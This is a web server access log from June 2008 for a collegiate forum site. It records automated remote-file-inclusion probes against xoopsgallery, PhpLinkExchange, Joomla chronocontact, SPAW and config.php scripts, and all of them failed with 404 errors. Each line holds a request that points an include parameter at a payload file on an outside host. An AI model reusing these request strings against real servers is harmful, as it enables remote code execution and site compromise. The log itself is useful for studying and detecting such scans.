87.106.10.53 - - [01/Jun/2008:18:46:18 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.collegiateforum.org"
87.106.10.53 - - [01/Jun/2008:18:46:18 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.collegiateforum.org"
87.106.10.53 - - [01/Jun/2008:18:46:22 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.collegiateforum.org"
87.106.10.53 - - [01/Jun/2008:18:46:23 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.collegiateforum.org"
87.106.10.53 - - [01/Jun/2008:18:46:24 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.collegiateforum.org"
87.106.10.53 - - [01/Jun/2008:18:46:24 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.collegiateforum.org"
89.108.64.164 - - [01/Jun/2008:18:46:25 -0700] "GET /logs/access_080128.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:46:28 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:46:28 -0700] "GET /logs/config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.collegiateforum.org"
87.106.10.53 - - [01/Jun/2008:18:46:31 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.collegiateforum.org"
87.106.10.53 - - [01/Jun/2008:18:46:31 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.collegiateforum.org"
84.243.253.159 - - [01/Jun/2008:18:46:54 -0700] "GET /logs/access.log/main.php?d1=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.72.119.227 - - [01/Jun/2008:18:46:58 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://piceadesign.co.uk/menu_bar/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
64.72.119.227 - - [01/Jun/2008:18:46:58 -0700] "GET //administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://piceadesign.co.uk/menu_bar/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
69.70.80.22 - - [01/Jun/2008:18:47:25 -0700] "GET /logs/access_080121.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
69.70.80.22 - - [01/Jun/2008:18:47:25 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
69.70.80.22 - - [01/Jun/2008:18:47:25 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:49:13 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:49:13 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:49:14 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:49:14 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:49:14 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:18:49:14 -0700] "GET /config.php?path_to_root=http://www.jef